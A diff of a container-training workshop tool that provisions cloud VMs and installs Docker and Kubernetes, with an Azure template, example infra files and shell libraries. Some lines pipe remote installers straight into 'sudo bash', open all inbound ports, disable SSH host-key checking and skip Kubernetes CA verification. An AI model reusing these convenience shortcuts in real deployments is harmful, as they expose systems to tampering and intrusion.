|
||||
### List VMs
|
||||
#### List tags
|
||||
|
||||
$ ./trainer list TAG
|
||||
$ ./workshopctl list infra/some-infra-file
|
||||
|
||||
This will print a human-friendly list containing some information about each instance.
|
||||
$ ./workshopctl listall
|
||||
|
||||
### Stop and destroy VMs
|
||||
$ ./workshopctl tags
|
||||
|
||||
$ ./trainer stop TAG
|
||||
#### Stop and destroy VMs
|
||||
|
||||
$ ./workshopctl stop TAG
|
||||
|
||||
## ToDo
|
||||
|
||||
* Don't write to bash history in system() in postprep
|
||||
* compose, etc version inconsistent (int vs str)
|
||||
- Don't write to bash history in system() in postprep
|
||||
- compose, etc version inconsistent (int vs str)
|
||||
|
||||
250
prepare-vms/azuredeploy.json
Normal file
250
prepare-vms/azuredeploy.json
Normal file
@@ -0,0 +1,250 @@
|
||||
{
|
||||
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
|
||||
"contentVersion": "1.0.0.0",
|
||||
"parameters": {
|
||||
"workshopName": {
|
||||
"type": "string",
|
||||
"defaultValue": "workshop",
|
||||
"metadata": {
|
||||
"description": "Workshop name."
|
||||
}
|
||||
},
|
||||
"vmPrefix": {
|
||||
"type": "string",
|
||||
"defaultValue": "node",
|
||||
"metadata": {
|
||||
"description": "Prefix for VM names."
|
||||
}
|
||||
},
|
||||
"numberOfInstances": {
|
||||
"type": "int",
|
||||
"defaultValue": 3,
|
||||
"metadata": {
|
||||
"description": "Number of VMs to create."
|
||||
}
|
||||
},
|
||||
"adminUsername": {
|
||||
"type": "string",
|
||||
"defaultValue": "ubuntu",
|
||||
"metadata": {
|
||||
"description": "Admin username for VMs."
|
||||
}
|
||||
},
|
||||
"sshKeyData": {
|
||||
"type": "string",
|
||||
"defaultValue": "",
|
||||
"metadata": {
|
||||
"description": "SSH rsa public key file as a string."
|
||||
}
|
||||
},
|
||||
"imagePublisher": {
|
||||
"type": "string",
|
||||
"defaultValue": "Canonical",
|
||||
"metadata": {
|
||||
"description": "OS image publisher; default Canonical."
|
||||
}
|
||||
},
|
||||
"imageOffer": {
|
||||
"type": "string",
|
||||
"defaultValue": "UbuntuServer",
|
||||
"metadata": {
|
||||
"description": "The name of the image offer. The default is Ubuntu"
|
||||
}
|
||||
},
|
||||
"imageSKU": {
|
||||
"type": "string",
|
||||
"defaultValue": "16.04-LTS",
|
||||
"metadata": {
|
||||
"description": "Version of the image. The default is 16.04-LTS"
|
||||
}
|
||||
},
|
||||
"vmSize": {
|
||||
"type": "string",
|
||||
"defaultValue": "Standard_D1_v2",
|
||||
"metadata": {
|
||||
"description": "VM Size."
|
||||
}
|
||||
}
|
||||
},
|
||||
"variables": {
|
||||
"vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
|
||||
"subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
|
||||
"vmName": "[parameters('vmPrefix')]",
|
||||
"sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
|
||||
"publicIPAddressName": "PublicIP",
|
||||
"publicIPAddressType": "Dynamic",
|
||||
"virtualNetworkName": "MyVNET",
|
||||
"netSecurityGroup": "MyNSG",
|
||||
"addressPrefix": "10.0.0.0/16",
|
||||
"subnet1Name": "subnet-1",
|
||||
"subnet1Prefix": "10.0.0.0/24",
|
||||
"nicName": "myVMNic"
|
||||
},
|
||||
"resources": [
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/publicIPAddresses",
|
||||
"name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"copy": {
|
||||
"name": "publicIPLoop",
|
||||
"count": "[parameters('numberOfInstances')]"
|
||||
},
|
||||
"properties": {
|
||||
"publicIPAllocationMethod": "[variables('publicIPAddressType')]"
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/virtualNetworks",
|
||||
"name": "[variables('virtualNetworkName')]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"dependsOn": [
|
||||
"[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
|
||||
],
|
||||
"properties": {
|
||||
"addressSpace": {
|
||||
"addressPrefixes": [
|
||||
"[variables('addressPrefix')]"
|
||||
]
|
||||
},
|
||||
"subnets": [
|
||||
{
|
||||
"name": "[variables('subnet1Name')]",
|
||||
"properties": {
|
||||
"addressPrefix": "[variables('subnet1Prefix')]",
|
||||
"networkSecurityGroup": {
|
||||
"id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/networkInterfaces",
|
||||
"name": "[concat(variables('nicName'),copyIndex(1))]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"copy": {
|
||||
"name": "nicLoop",
|
||||
"count": "[parameters('numberOfInstances')]"
|
||||
},
|
||||
"dependsOn": [
|
||||
"[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
|
||||
"[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
|
||||
],
|
||||
"properties": {
|
||||
"ipConfigurations": [
|
||||
{
|
||||
"name": "ipconfig1",
|
||||
"properties": {
|
||||
"privateIPAllocationMethod": "Dynamic",
|
||||
"publicIPAddress": {
|
||||
"id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
|
||||
},
|
||||
"subnet": {
|
||||
"id": "[variables('subnet1Ref')]"
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-12-01",
|
||||
"type": "Microsoft.Compute/virtualMachines",
|
||||
"name": "[concat(variables('vmName'),copyIndex(1))]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"copy": {
|
||||
"name": "vmLoop",
|
||||
"count": "[parameters('numberOfInstances')]"
|
||||
},
|
||||
"dependsOn": [
|
||||
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
|
||||
],
|
||||
"properties": {
|
||||
"hardwareProfile": {
|
||||
"vmSize": "[parameters('vmSize')]"
|
||||
},
|
||||
"osProfile": {
|
||||
"computerName": "[concat(variables('vmName'),copyIndex(1))]",
|
||||
"adminUsername": "[parameters('adminUsername')]",
|
||||
"linuxConfiguration": {
|
||||
"disablePasswordAuthentication": true,
|
||||
"ssh": {
|
||||
"publicKeys": [
|
||||
{
|
||||
"path": "[variables('sshKeyPath')]",
|
||||
"keyData": "[parameters('sshKeyData')]"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
"storageProfile": {
|
||||
"osDisk": {
|
||||
"createOption": "FromImage"
|
||||
},
|
||||
"imageReference": {
|
||||
"publisher": "[parameters('imagePublisher')]",
|
||||
"offer": "[parameters('imageOffer')]",
|
||||
"sku": "[parameters('imageSKU')]",
|
||||
"version": "latest"
|
||||
}
|
||||
},
|
||||
"networkProfile": {
|
||||
"networkInterfaces": [
|
||||
{
|
||||
"id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/networkSecurityGroups",
|
||||
"name": "[variables('netSecurityGroup')]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
},
|
||||
"properties": {
|
||||
"securityRules": [
|
||||
{
|
||||
"name": "default-open-ports",
|
||||
"properties": {
|
||||
"protocol": "Tcp",
|
||||
"sourcePortRange": "*",
|
||||
"destinationPortRange": "*",
|
||||
"sourceAddressPrefix": "*",
|
||||
"destinationAddressPrefix": "*",
|
||||
"access": "Allow",
|
||||
"priority": 1000,
|
||||
"direction": "Inbound"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
],
|
||||
"outputs": {
|
||||
"resourceID": {
|
||||
"type": "string",
|
||||
"value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
|
||||
}
|
||||
}
|
||||
}
|
||||
18
prepare-vms/azuredeploy.parameters.json
Normal file
18
prepare-vms/azuredeploy.parameters.json
Normal file
@@ -0,0 +1,18 @@
|
||||
{
|
||||
"$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
|
||||
"contentVersion": "1.0.0.0",
|
||||
"parameters": {
|
||||
"sshKeyData": {
|
||||
"value": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXTIl/M9oeSlcsC5Rfe+nZr4Jc4sl200pSw2lpdxlZ3xzeP15NgSSMJnigUrKUXHfqRQ+2wiPxEf0Odz2GdvmXvR0xodayoOQsO24AoERjeSBXCwqITsfp1bGKzMb30/3ojRBo6LBR6r1+lzJYnNCGkT+IQwLzRIpm0LCNz1j08PUI2aZ04+mcDANvHuN/hwi/THbLLp6SNWN43m9r02RcC6xlCNEhJi4wk4VzMzVbSv9RlLGST2ocbUHwmQ2k9OUmpzoOx73aQi9XNnEaFh2w/eIdXM75VtkT3mRryyykg9y0/hH8/MVmIuRIdzxHQqlm++DLXVH5Ctw6a4kS+ki7 workshop"
|
||||
},
|
||||
"workshopName": {
|
||||
"value": "workshop"
|
||||
},
|
||||
"numberOfInstances": {
|
||||
"value": 3
|
||||
},
|
||||
"vmSize": {
|
||||
"value": "Standard_D1_v2"
|
||||
}
|
||||
}
|
||||
}
|
||||
12
prepare-vms/cncsetup.sh
Normal file
12
prepare-vms/cncsetup.sh
Normal file
@@ -0,0 +1,12 @@
|
||||
#!/bin/sh
|
||||
if [ $(whoami) != ubuntu ]; then
|
||||
echo "This script should be executed on a freshly deployed node,"
|
||||
echo "with the 'ubuntu' user. Aborting."
|
||||
exit 1
|
||||
fi
|
||||
if id docker; then
|
||||
sudo userdel -r docker
|
||||
fi
|
||||
sudo apt-get update -q
|
||||
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
|
||||
pip install --user awscli jinja2 pdfkit pssh
|
||||
@@ -1,26 +1,19 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
prepare-vms:
|
||||
workshopctl:
|
||||
build: .
|
||||
container_name: prepare-vms
|
||||
image: workshopctl
|
||||
working_dir: /root/prepare-vms
|
||||
volumes:
|
||||
- $HOME/.aws/:/root/.aws/
|
||||
- /etc/localtime:/etc/localtime:ro
|
||||
- /tmp/.X11-unix:/tmp/.X11-unix
|
||||
- $SSH_AUTH_DIRNAME:$SSH_AUTH_DIRNAME
|
||||
- $SSH_AUTH_SOCK:$SSH_AUTH_SOCK
|
||||
- $PWD/:/root/prepare-vms/
|
||||
environment:
|
||||
SCRIPT_DIR: /root/prepare-vms
|
||||
DISPLAY: ${DISPLAY}
|
||||
SSH_AUTH_SOCK: ${SSH_AUTH_SOCK}
|
||||
SSH_AGENT_PID: ${SSH_AGENT_PID}
|
||||
AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID}
|
||||
AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY}
|
||||
AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION}
|
||||
AWS_DEFAULT_OUTPUT: json
|
||||
AWS_INSTANCE_TYPE: ${AWS_INSTANCE_TYPE}
|
||||
AWS_VPC_ID: ${AWS_VPC_ID}
|
||||
USER: ${USER}
|
||||
entrypoint: /root/prepare-vms/scripts/trainer-cli
|
||||
entrypoint: /root/prepare-vms/workshopctl
|
||||
|
||||
BIN
prepare-vms/docker.png
Normal file
BIN
prepare-vms/docker.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 127 KiB |
6
prepare-vms/infra/example.aws
Normal file
6
prepare-vms/infra/example.aws
Normal file
@@ -0,0 +1,6 @@
|
||||
INFRACLASS=aws
|
||||
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
|
||||
# and customize the variables below.
|
||||
export AWS_DEFAULT_REGION=us-east-1
|
||||
export AWS_ACCESS_KEY_ID=AKI...
|
||||
export AWS_SECRET_ACCESS_KEY=...
|
||||
2
prepare-vms/infra/example.generic
Normal file
2
prepare-vms/infra/example.generic
Normal file
@@ -0,0 +1,2 @@
|
||||
INFRACLASS=generic
|
||||
# This is for manual provisioning. No other variable or configuration is needed.
|
||||
9
prepare-vms/infra/example.openstack
Normal file
9
prepare-vms/infra/example.openstack
Normal file
@@ -0,0 +1,9 @@
|
||||
INFRACLASS=openstack
|
||||
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
|
||||
# and customize the variables below.
|
||||
export TF_VAR_user="jpetazzo"
|
||||
export TF_VAR_tenant="training"
|
||||
export TF_VAR_domain="Default"
|
||||
export TF_VAR_password="..."
|
||||
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
|
||||
export TF_VAR_flavor="GP1.S"
|
||||
90
prepare-vms/lib/cli.sh
Normal file
90
prepare-vms/lib/cli.sh
Normal file
@@ -0,0 +1,90 @@
|
||||
# Abort if any error happens, and show the command that caused the error.
|
||||
_ERR() {
|
||||
error "Command $BASH_COMMAND failed (exit status: $?)"
|
||||
}
|
||||
set -eE
|
||||
trap _ERR ERR
|
||||
|
||||
die() {
|
||||
if [ -n "$1" ]; then
|
||||
error "$1"
|
||||
fi
|
||||
exit 1
|
||||
}
|
||||
|
||||
error() {
|
||||
>/dev/stderr echo "[$(red ERROR)] $1"
|
||||
}
|
||||
|
||||
warning() {
|
||||
>/dev/stderr echo "[$(yellow WARNING)] $1"
|
||||
}
|
||||
|
||||
info() {
|
||||
>/dev/stderr echo "[$(green INFO)] $1"
|
||||
}
|
||||
|
||||
# Print a full-width separator.
|
||||
# If given an argument, will print it in the middle of that separator.
|
||||
# If the argument is longer than the screen width, it will be printed between two separator lines.
|
||||
sep() {
|
||||
if [ -z "$COLUMNS" ]; then
|
||||
COLUMNS=80
|
||||
fi
|
||||
SEP=$(yes = | tr -d "\n" | head -c $(($COLUMNS - 1)))
|
||||
if [ -z "$1" ]; then
|
||||
>/dev/stderr echo $SEP
|
||||
else
|
||||
MSGLEN=$(echo "$1" | wc -c)
|
||||
if [ $(($MSGLEN + 4)) -gt $COLUMNS ]; then
|
||||
>/dev/stderr echo "$SEP"
|
||||
>/dev/stderr echo "$1"
|
||||
>/dev/stderr echo "$SEP"
|
||||
else
|
||||
LEFTLEN=$((($COLUMNS - $MSGLEN - 2) / 2))
|
||||
RIGHTLEN=$(($COLUMNS - $MSGLEN - 2 - $LEFTLEN))
|
||||
LEFTSEP=$(echo $SEP | head -c $LEFTLEN)
|
||||
RIGHTSEP=$(echo $SEP | head -c $RIGHTLEN)
|
||||
>/dev/stderr echo "$LEFTSEP $1 $RIGHTSEP"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
need_infra() {
|
||||
if [ -z "$1" ]; then
|
||||
die "Please specify infrastructure file. (e.g.: infra/aws)"
|
||||
fi
|
||||
if [ "$1" = "--infra" ]; then
|
||||
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
|
||||
fi
|
||||
if [ ! -f "$1" ]; then
|
||||
die "Infrastructure file $1 doesn't exist."
|
||||
fi
|
||||
. "$1"
|
||||
. "lib/infra/$INFRACLASS.sh"
|
||||
}
|
||||
|
||||
need_tag() {
|
||||
if [ -z "$TAG" ]; then
|
||||
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
|
||||
fi
|
||||
if [ ! -d "tags/$TAG" ]; then
|
||||
die "Tag $TAG not found (directory tags/$TAG does not exist)."
|
||||
fi
|
||||
for FILE in settings.yaml ips.txt infra.sh; do
|
||||
if [ ! -f "tags/$TAG/$FILE" ]; then
|
||||
warning "File tags/$TAG/$FILE not found."
|
||||
fi
|
||||
done
|
||||
. "tags/$TAG/infra.sh"
|
||||
. "lib/infra/$INFRACLASS.sh"
|
||||
}
|
||||
|
||||
need_settings() {
|
||||
if [ -z "$1" ]; then
|
||||
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
|
||||
fi
|
||||
if [ ! -f "$1" ]; then
|
||||
die "Settings file $1 doesn't exist."
|
||||
fi
|
||||
}
|
||||
15
prepare-vms/lib/colors.sh
Normal file
15
prepare-vms/lib/colors.sh
Normal file
@@ -0,0 +1,15 @@
|
||||
bold() {
|
||||
echo "$(tput bold)$1$(tput sgr0)"
|
||||
}
|
||||
|
||||
red() {
|
||||
echo "$(tput setaf 1)$1$(tput sgr0)"
|
||||
}
|
||||
|
||||
green() {
|
||||
echo "$(tput setaf 2)$1$(tput sgr0)"
|
||||
}
|
||||
|
||||
yellow() {
|
||||
echo "$(tput setaf 3)$1$(tput sgr0)"
|
||||
}
|
||||
695
prepare-vms/lib/commands.sh
Normal file
695
prepare-vms/lib/commands.sh
Normal file
@@ -0,0 +1,695 @@
|
||||
export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
_cmd_help() {
|
||||
printf "$(basename $0) - the container training swiss army knife\n"
|
||||
printf "Commands:"
|
||||
printf "%s" "$HELP" | sort
|
||||
}
|
||||
|
||||
_cmd build "Build the Docker image to run this program in a container"
|
||||
_cmd_build() {
|
||||
docker-compose build
|
||||
}
|
||||
|
||||
_cmd wrap "Run this program in a container"
|
||||
_cmd_wrap() {
|
||||
docker-compose run --rm workshopctl "$@"
|
||||
}
|
||||
|
||||
_cmd cards "Generate ready-to-print cards for a group of VMs"
|
||||
_cmd_cards() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# This will process ips.txt to generate two files: ips.pdf and ips.html
|
||||
(
|
||||
cd tags/$TAG
|
||||
../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
}
|
||||
|
||||
_cmd deploy "Install Docker on a bunch of running VMs"
|
||||
_cmd_deploy() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# wait until all hosts are reachable before trying to deploy
|
||||
info "Trying to reach $TAG instances..."
|
||||
while ! tag_is_reachable; do
|
||||
>/dev/stderr echo -n "."
|
||||
sleep 2
|
||||
done
|
||||
>/dev/stderr echo ""
|
||||
|
||||
echo deploying > tags/$TAG/status
|
||||
sep "Deploying tag $TAG"
|
||||
|
||||
# Wait for cloudinit to be done
|
||||
pssh "
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done"
|
||||
|
||||
# Copy settings and install Python YAML parser
|
||||
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install -y python-yaml"
|
||||
|
||||
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
|
||||
pssh -I tee /tmp/postprep.py <lib/postprep.py
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
|
||||
|
||||
# Install docker-prompt script
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
pssh "
|
||||
grep docker@ /home/docker/.ssh/authorized_keys ||
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
|
||||
sep "Deployed tag $TAG"
|
||||
echo deployed > tags/$TAG/status
|
||||
info "You may want to run one of the following commands:"
|
||||
info "$0 kube $TAG"
|
||||
info "$0 pull_images $TAG"
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo systemctl disable docker.service"
|
||||
pssh "sudo systemctl disable docker.socket"
|
||||
pssh "sudo systemctl stop docker"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
|
||||
fi
|
||||
if ! [ -x kubelet ]; then
|
||||
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
|
||||
do
|
||||
sudo ln -s hyperkube \$BINARY
|
||||
done
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
|
||||
_cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Optional version, e.g. 1.13.5
|
||||
KUBEVERSION=$2
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
EXTRA_KUBELET="=$KUBEVERSION-00"
|
||||
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
|
||||
else
|
||||
EXTRA_KUBELET=""
|
||||
EXTRA_KUBEADM=""
|
||||
fi
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
|
||||
sudo apt-key add - &&
|
||||
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
|
||||
|
||||
# Initialize kube master
|
||||
pssh --timeout 200 "
|
||||
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token &&
|
||||
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
|
||||
fi"
|
||||
|
||||
# Put kubeconfig in ubuntu's and docker's accounts
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
|
||||
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
|
||||
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
|
||||
sudo chown -R \$(id -u) \$HOME/.kube &&
|
||||
sudo chown -R docker /home/docker/.kube
|
||||
fi"
|
||||
|
||||
# Install weave as the pod network
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n') &&
|
||||
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
|
||||
fi"
|
||||
|
||||
# Join the other nodes to the cluster
|
||||
pssh --timeout 200 "
|
||||
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
|
||||
fi"
|
||||
|
||||
# Install metrics server
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
|
||||
fi"
|
||||
|
||||
# Install kubectx and kubens
|
||||
pssh "
|
||||
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
|
||||
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
|
||||
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
|
||||
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
|
||||
sudo -u docker tee -a /home/docker/.bashrc <<EOF
|
||||
. /home/ubuntu/kube-ps1/kube-ps1.sh
|
||||
KUBE_PS1_PREFIX=""
|
||||
KUBE_PS1_SUFFIX=""
|
||||
KUBE_PS1_SYMBOL_ENABLE="false"
|
||||
KUBE_PS1_CTX_COLOR="green"
|
||||
KUBE_PS1_NS_COLOR="green"
|
||||
EOF"
|
||||
|
||||
# Install stern
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
|
||||
# Install helm
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/helm ]; then
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash &&
|
||||
helm completion bash | sudo tee /etc/bash_completion.d/helm
|
||||
fi"
|
||||
|
||||
# Install ship
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ship ]; then
|
||||
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
|
||||
_cmd_kubereset() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo kubeadm reset --force"
|
||||
}
|
||||
|
||||
_cmd kubetest "Check that all nodes are reporting as Ready"
|
||||
_cmd_kubetest() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# There are way too many backslashes in the command below.
|
||||
# Feel free to make that better ♥
|
||||
pssh "
|
||||
set -e
|
||||
if i_am_first_node; then
|
||||
which kubectl
|
||||
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
|
||||
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
|
||||
done
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
|
||||
_cmd_ids() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
info "Looking up by tag:"
|
||||
aws_get_instance_ids_by_tag $TAG
|
||||
|
||||
# Just in case we managed to create instances but weren't able to tag them
|
||||
info "Looking up by token:"
|
||||
aws_get_instance_ids_by_client_token $TAG
|
||||
}
|
||||
|
||||
_cmd list "List available groups for a given infrastructure"
|
||||
_cmd_list() {
|
||||
need_infra $1
|
||||
infra_list
|
||||
}
|
||||
|
||||
_cmd listall "List VMs running on all configured infrastructures"
|
||||
_cmd_listall() {
|
||||
for infra in infra/*; do
|
||||
case $infra in
|
||||
infra/example.*)
|
||||
;;
|
||||
